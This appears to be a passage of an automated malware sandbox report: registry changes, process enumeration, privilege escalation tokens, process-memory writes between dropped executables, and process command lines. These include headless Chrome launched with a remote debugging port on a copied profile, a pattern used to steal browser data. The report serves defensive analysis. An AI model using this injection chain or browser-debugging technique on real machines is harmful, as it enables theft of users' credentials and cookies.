Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4880 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4880 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4880 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4880 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4880 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4880 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4880 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4880 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4880 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 260 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 260 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4924 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4924 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=31791 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc00439758,0x7ffc00439768,0x7ffc00439778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1368 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1688 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=31791 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1984 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

